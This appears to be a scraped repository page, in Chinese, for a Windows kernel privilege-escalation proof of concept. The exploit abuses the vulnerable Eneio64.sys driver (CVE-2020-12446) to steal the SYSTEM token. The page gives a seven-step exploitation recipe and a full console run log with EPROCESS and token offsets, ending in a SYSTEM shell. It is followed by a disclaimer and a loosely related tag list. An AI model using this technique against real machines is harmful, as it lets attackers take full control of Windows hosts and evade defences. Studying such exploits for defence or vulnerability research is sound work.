S1lkys/Eneio64-LPE

1. 打开易受攻击驱动程序的句柄 2. 将物理内存映射到用户空间 3. 打开 System 进程的句柄 4. 查询当前进程的 SystemHandleInformation 表以获取 System 句柄，从而泄露其 EPROCESS 地址。 5. 遍历 System EPROCESS ActiveProcessLinks flink，直到找到当前进程的 PID。 6. 使用 System 进程的 token 替换当前进程的 token 7. 启动一个新的 powershell 进程。 使用 superfetch 方法进行虚拟地址到物理地址的转换，而不是通过泄露 CR3 并遍历页表。 在 Win11 21H2 上测试通过 ``` C:\Users\Public>.\Eneio64-LPE.exe [+] Total physical memory: ~0x7fef2000 bytes [+] Mapped physical memory at 000002A3A4FC0000 [+] Leaking System EPROCESS [+] Opened handle to SYSTEM process (PID 4) > Current PID: 3932 > Handle value: 0x5c [+] Querying SystemHandleInformation table of current process [+] Handle table queried successfully > Buffer size: 1048576 bytes > Resize rounds: 15 > Total handles: 29211 [+] Searching for handle 0x5c in handle table [+] Match found at index 29183 / 29211 > PID: 3932 > Handle: 0x5c > Object (System EPROCESS): 0xffff858ca1885040 [+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID [+] Next Flink addr - 0x448 = Next EPROCESS [+] Found current process (PID 3932) token at [0x72cd25f8] [+] Patching current token with SYSTEM token [!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ==== [+] Token replaced. Microsoft Windows [Version 10.0.20348.2849] (c) Microsoft Corporation. All rights reserved. C:\Users\Public>whoami nt authority\system ``` 仅供教育用途！

标签：0day挖掘, C/C++, CVE-2020-12446, EDR 绕过, Eneio64.sys, EPROCESS 遍历, NT AUTHORITY\SYSTEM, OpenCanary, PoC, RFI远程文件包含, SecList, Shell模拟, SIP, Superfetch, Token 窃取, UML, Web报告查看器, Windows 11, Windows LPE, Windows 安全, 事务性I/O, 内存取证, 内核安全, 内核漏洞利用, 协议分析, 暴力破解, 本地提权, 权限提升, 漏洞复现, 物理内存映射, 红队技术, 网络安全, 隐私保护, 驱动漏洞